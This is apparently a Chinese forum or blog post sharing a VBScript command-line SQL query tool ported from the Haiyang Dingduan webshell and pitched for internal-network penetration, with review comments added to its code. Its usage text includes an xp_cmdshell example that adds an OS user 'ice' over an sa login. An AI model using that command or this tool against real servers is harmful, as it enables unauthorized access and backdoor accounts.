vbs版的sql查询分析器,该有的功能都有了
	 
	 
	花了一点时间把以前海阳顶端2006的sql模块改成了vbs版,功能和原版一模一样。用起来可能没有asp版舒服,但能用,而且可以在dos(命令行)下运行,渗透内网时估计你用得着。 
	
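	' Host check: WScript.FullName ends in "wscript.exe" when the script was started by the
	' windowed host, where each echo would pop up a dialog. Ask for the console host and stop.
	If LCase(Right(WScript.FullName, 11)) = "wscript.exe" Then
		echo "Execute it under the cmd.exe Plz! Thx."
		echo "code by lcx"
		WScript.Quit
	End If

	' No arguments: print the usage text and stop.
	' Fix: the original fell through after printing the usage, so the dispatcher below then
	' failed on WScript.Arguments(0) with a subscript error.
	'
	' NOTE(review): every mode takes the full connection string, password included, as a
	' command-line argument. Command lines are recorded wherever process-creation auditing is
	' enabled, so the credential ends up in those logs. The samples also connect as "sa"; the
	' last sample goes through the non-SELECT path of showQuery and relies on xp_cmdshell,
	' which SQL Server 2005 and later ship disabled by default.
	If WScript.Arguments.Count < 1 Then
		echo "Usage: cscript sql.vbs showTables e:/hytop.mdb或sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs;"
		echo "usage: cscript sql.vbs query 连接字符串 <表名=default:""""> sql语句 <页数=default:1>"
		echo "exp:cscript sql.vbs showTables "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)
		echo "exp:cscript sql.vbs query "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&"select * from name"&chr(34)&Space(1) & 1
		echo "exp:cscript sql.vbs query "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&"update....."&chr(34)&Space(1) & 1
		echo "exp:cscript sql.vbs query "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&"exec master.dbo.xp_cmdshell 'net user ice hacker /add'--"&chr(34)&Space(1) & 1
		WScript.Quit
	End If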
	
	Sub chkErr(Err)
		' Reports a pending runtime error and terminates the script.
		'   Err - the error object to inspect; nothing happens when it evaluates to zero/False.
		' NOTE(review): the callers in this listing invoke chkErr right after conn.Open / rs.Open,
		' but no "On Error Resume Next" is visible here. Without it a failing call aborts the
		' script before chkErr is reached - confirm against the full file.
		Dim report
		If Err Then
			report = "错误: " & Err.Description & "错误源: " & Err.Source & vbcrlf
			echo report
			Err.Clear
			WScript.Quit
		End If
	End Sub
	
	
	Sub echo(str)
		' Writes one value through the script host; every message in this file goes through here.
		Call WScript.Echo(str)
	End Sub
	
	Function fixNull(str)
		' Returns str, substituting a single space when str is Null so it can be concatenated
		' and printed. The parameter has no ByVal, so a Null variable passed in is overwritten too.
		If IsNull(str) Then str = " "
		fixNull = str
	End Function
	
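	Sub showErr(str)
		' Prints a numbered list of error messages and terminates the script.
		'   str - one or more messages joined with "$$".
		' Fix: the original appended the HTML tag "<br/>" to every line, a leftover from the ASP
		' version; on the console it was printed literally, so it is dropped here.
		Dim i, arrayStr
		arrayStr = Split(str, "$$")
		echo "出错信息:" & vbCrLf
		For i = 0 To UBound(arrayStr)
			echo (i + 1) & ". " & arrayStr(i)
		Next
		echo vbCrLf
		WScript.Quit
	End Sub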
	
	Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
	Rem Module selection: hand control to the dispatcher
	Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	' Script entry point: pageMsDataBase reads the action from the command line.
	Call pageMsDataBase()
	
	
	
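	Sub pageMsDataBase()
		' Dispatcher: reads the action name from argument 0 and runs the matching routine.
		' "showTables" and "query" are the only actions; both need argument 1 (the data source).
		' Fixes: the original indexed Arguments(0) and Arguments(1) without checking the count,
		' which raised a subscript error when they were missing. It copied argument 1 into a local
		' that was never used, and it ignored an unrecognised action without any message.
		Dim theAct

		If WScript.Arguments.Count < 2 Then
			echo "Missing arguments: an action and a connection string (or .mdb path) are required."
			WScript.Quit
		End If
		theAct = WScript.Arguments(0)

		' The comparison is case-sensitive, exactly as in the original.
		Select Case theAct
			Case "showTables"
				showTables()
			Case "query"
				showQuery()
			Case Else
				echo "Unknown action: " & theAct
		End Select
	End Sub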
	
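	Sub showTables()
		' Lists every table of the data source named in argument 1, then each table's columns
		' (name, type, size, precision, nullability, default).
		' Argument 1 is either "sql:" followed by a complete OLE DB connection string, or a
		' path that is opened through the Jet 4.0 provider.
		' Fixes over the original:
		'   - "vbclrf" was a typo for vbCrLf; as an undeclared variable it was Empty, so the
		'     intended line breaks were never printed.
		'   - conn.Open is now trapped, so chkErr can report a failed connection; before, the
		'     runtime error aborted the script first.
		'   - the argument count is checked, and the schema recordsets are closed after use.
		Dim conn, sqlStr, rsTable, rsColumn, connStr, tablesStr

		If WScript.Arguments.Count < 2 Then
			echo "Missing connection string (or .mdb path)."
			WScript.Quit
		End If
		sqlStr = WScript.Arguments(1)

		If LCase(Left(sqlStr, 4)) = "sql:" Then
			connStr = Mid(sqlStr, 5)
		Else
			connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
		End If
		Set conn = CreateObject("Adodb.Connection")

		On Error Resume Next
		conn.Open connStr
		chkErr Err
		On Error GoTo 0

		' getTableList prints a heading, returns the formatted table names and leaves the
		' table recordset in rsTable.
		tablesStr = getTableList(conn, sqlStr, rsTable)

		echo tablesStr & "================================================="

		Do Until rsTable.EOF
			' 4 = adSchemaColumns; restrictions are (catalog, schema, table name).
			Set rsColumn = conn.OpenSchema(4, Array(Empty, Empty, rsTable("Table_Name").Value))
			echo rsTable("Table_Name") & vbCrLf

			Do Until rsColumn.EOF
				echo "字段名:" & rsColumn("Column_Name") & vbCrLf
				echo "类型:" & getDataType(rsColumn("Data_Type")) & vbCrLf
				echo "大小:" & rsColumn("Character_Maximum_Length") & vbCrLf
				echo "精度:" & rsColumn("Numeric_Precision") & vbCrLf
				echo "允许为空:" & rsColumn("Is_Nullable") & vbCrLf
				echo "默认值:" & rsColumn("Column_Default") & vbCrLf & vbCrLf
				rsColumn.MoveNext
			Loop
			rsColumn.Close

			rsTable.MoveNext
			echo vbCrLf
		Loop

		echo "==============================================================="

		rsTable.Close
		conn.Close
		Set conn = Nothing
		Set rsTable = Nothing
		Set rsColumn = Nothing
	End Sub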
	
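	Sub showQuery()
		' Runs one SQL statement against the data source named in argument 1.
		'   argument 2 - table name, used only in the result heading (optional)
		'   argument 3 - the SQL text
		'   argument 4 - 1-based result page, 20 rows per page (optional, default 1)
		' A statement starting with "select " is opened as a recordset and one page is printed.
		' Any other non-empty statement is handed to conn.Execute unchanged and only a
		' completion message is printed.
		' NOTE(review): that second path runs arbitrary SQL with the privileges of the login in
		' the connection string. On a database server the statement text is what auditing and
		' least-privilege logins have to account for.
		' Fixes over the original:
		'   - arguments 2..4 are optional as the usage text says; the original indexed
		'     Arguments(4) unconditionally and failed when the page was omitted.
		'   - the page is converted to a number, forced to at least 1 and capped at the page count
		'     before it is assigned to AbsolutePage.
		'   - the page total comes from rs.PageCount; the original counted it with an empty loop
		'     and printed the requested page when the count was zero.
		'   - conn.Open / rs.Open / conn.Execute are trapped so chkErr can report failures.
		Dim i, j, rs, sql, page, pageTotal, conn, sqlStr, connStr, rsTable, tablesStr, theTable
		Dim argCount

		argCount = WScript.Arguments.Count
		If argCount < 2 Then
			echo "Missing connection string (or .mdb path)."
			WScript.Quit
		End If

		sqlStr = WScript.Arguments(1)
		theTable = ""
		sql = ""
		page = "1"
		If argCount > 2 Then theTable = WScript.Arguments(2)
		If argCount > 3 Then sql = WScript.Arguments(3)
		If argCount > 4 Then page = WScript.Arguments(4)

		' IsNumeric("") is False, so an empty page argument also falls back to 1.
		If IsNumeric(page) Then
			page = CLng(page)
		Else
			page = 1
		End If
		If page < 1 Then page = 1

		If LCase(Left(sqlStr, 4)) = "sql:" Then
			connStr = Mid(sqlStr, 5)
		Else
			connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
		End If
		Set rs = CreateObject("Adodb.RecordSet")
		Set conn = CreateObject("Adodb.Connection")

		On Error Resume Next
		conn.Open connStr
		chkErr Err
		On Error GoTo 0

		tablesStr = getTableList(conn, sqlStr, rsTable)

		echo "数据库表结构查看:"
		echo tablesStr & "========================================================"
		echo ">SQL命令执行及查看<:" & vbCrLf

		If sql <> "" And Left(LCase(sql), 7) = "select " Then
			' Cursor type 1 and lock type 1, as in the original.
			On Error Resume Next
			rs.Open sql, conn, 1, 1
			chkErr Err
			On Error GoTo 0

			rs.PageSize = 20
			pageTotal = rs.PageCount
			If Not rs.EOF Then
				If pageTotal > 0 And page > pageTotal Then page = pageTotal
				rs.AbsolutePage = page
			End If

			If rs.Fields.Count > 0 Then
				echo "SQL操作 - 执行结果" & vbCrLf
				echo "====================" & theTable & "列名如下========================================"
				For j = 0 To rs.Fields.Count - 1
					echo rs.Fields(j).Name & vbCrLf
				Next
				' Print at most one page (20 rows), one field value per line.
				For i = 1 To 20
					If rs.EOF Then Exit For
					For j = 0 To rs.Fields.Count - 1
						echo fixNull(rs(j)) & vbCrLf
					Next
					rs.MoveNext
				Next
			End If

			echo "================================================================="
			echo " 共有" & rs.Fields.Count & "列" & vbCrLf
			echo " 共有" & pageTotal & "页"
			rs.Close
		ElseIf sql <> "" Then
			On Error Resume Next
			conn.Execute sql
			chkErr Err
			On Error GoTo 0
			echo "执行完毕!" & vbCrLf
		End If

		rsTable.Close
		conn.Close
		Set rs = Nothing
		Set conn = Nothing
		Set rsTable = Nothing
	End Sub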
	
	Function getDataType(typeId)
		' Maps a numeric column type code to the display label used in the column listing.
		' showTables passes the Data_Type value from the column schema rowset.
		' Codes not listed below are returned unchanged.
		Select Case typeId
			Case 2:   getDataType = "整型"
			Case 3:   getDataType = "长整型"
			Case 5:   getDataType = "双精度型"
			Case 7:   getDataType = "日期/时间"
			Case 11:  getDataType = "是/否"
			Case 128: getDataType = "OLE 对象"
			Case 130: getDataType = "文本"
			Case Else
				getDataType = typeId
		End Select
	End Function
	
	
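	Function getTableList(conn, sqlStr, rsTable)
		' Prints a heading and returns the names of all tables as "[name]" lines.
		'   conn    - an open ADO connection
		'   sqlStr  - not used by this function; kept so existing callers still work
		'   rsTable - output: receives the table schema recordset, positioned on its first row.
		'             The callers in this file read it after the call.
		' Fixes: the result is now always a string ("" when there are no tables, previously
		' Empty). MoveFirst is skipped on an empty recordset, where the original raised a
		' BOF/EOF error.
		Dim names
		names = ""

		' 20 = adSchemaTables; restrictions are (catalog, schema, table name, table type).
		Set rsTable = conn.OpenSchema(20, Array(Empty, Empty, Empty, "table"))
		echo "存在以下表名:"
		Do Until rsTable.EOF
			names = names & "[" & rsTable("Table_Name") & "]" & vbCrLf
			rsTable.MoveNext
		Loop

		' BOF and EOF are both True only when the recordset has no rows.
		If Not (rsTable.BOF And rsTable.EOF) Then rsTable.MoveFirst

		getTableList = names
	End Function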